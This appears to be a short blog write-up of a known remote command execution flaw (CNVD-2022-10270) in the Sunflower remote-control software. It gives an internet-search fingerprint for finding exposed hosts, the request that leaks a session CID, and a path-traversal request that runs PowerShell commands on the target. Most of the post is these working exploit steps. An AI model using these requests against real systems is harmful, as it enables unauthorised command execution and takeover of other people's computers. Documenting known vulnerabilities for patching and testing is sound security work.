Sunflower Check Remote Command Execution Vulnerability Cnvd 2022 10270
Sunflower Check Remote Command Execution Vulnerability Cnvd 2022 10270
Sunflower check Remote command execution vulnerability CNVD-2022-10270
Vulnerability Description
After Sunflower obtains the CID by sending a specific request, it can call the check interface to implement remote command execution, resulting in the server permission being obtained.
Vulnerability Impact
11.0.0.33162
Network surveying and mapping
body=”Verification failure”
Vulnerability reappears
After opening the sunflower, it will open a certain port between 40000-65535 by default.
Send a request to obtain the CID
1
/cgi-bin/rpc?action=verify-haras
Use the obtained verification_string as the CID field of the cookie to execute the command
1
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
This post is licensed under CC BY 4.0 by the author.